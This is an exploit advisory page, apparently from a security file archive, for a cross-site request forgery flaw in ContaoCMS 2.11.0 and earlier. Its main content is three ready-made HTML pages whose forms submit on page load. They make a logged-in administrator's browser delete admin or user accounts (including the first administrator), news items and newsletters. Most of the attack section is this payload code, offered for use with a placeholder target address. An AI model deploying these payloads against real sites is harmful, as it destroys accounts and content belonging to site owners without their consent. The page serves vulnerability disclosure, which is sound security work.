ContaoCMS 2.11.0 Cross Site Request Forgery

ContaoCMS 2.11.0 Cross Site Request Forgery: Posted Feb 27, 2012; Authored by Ivano Binetti; ContaoCMS versions 2.11.0 and below suffer from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | be6060f236e03da403ef3d6884992c51697ad738bbd2580409adce97b9ec4b35; Download | Favorite | View

ContaoCMS 2.11.0 Cross Site Request Forgery

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
# Date          : 25-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://www.contao.org/en/download.html
# Vendor site   : http://www.contao.org
# Version       : 2.11.0 (latest) and lower 
# Tested on     : Debian Squeeze (6.0) 
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+

Summary
1)Introduction
2)Vulnerabilities Description
  2.1 Delete Administrators or Users 
  2.2 Delete News
  2.3 Delete Newsletter
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".

2)Vulnerabilities Description
Contao 2.11 (and lower)  is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages 
(articles, news, newsletter and so on).
 
 2.1 Delete Administrators or Users
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete ADMIN/USER account</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">
  </body>
  </html>

  Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase.
  
  2.2 Delete News
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete News</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">
  </form>
  </body>
  </html>


  2.3 Delete Newsletter 
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete Newsletter</H2>
  <form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">
  </form>
  </body>
  </html>
+--------------------------------------------------------------------------------------------------------------------------------+

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

ContaoCMS 2.11.0 Cross Site Request Forgery

ContaoCMS 2.11.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ContaoCMS 2.11.0 Cross Site Request Forgery

Share This

ContaoCMS 2.11.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems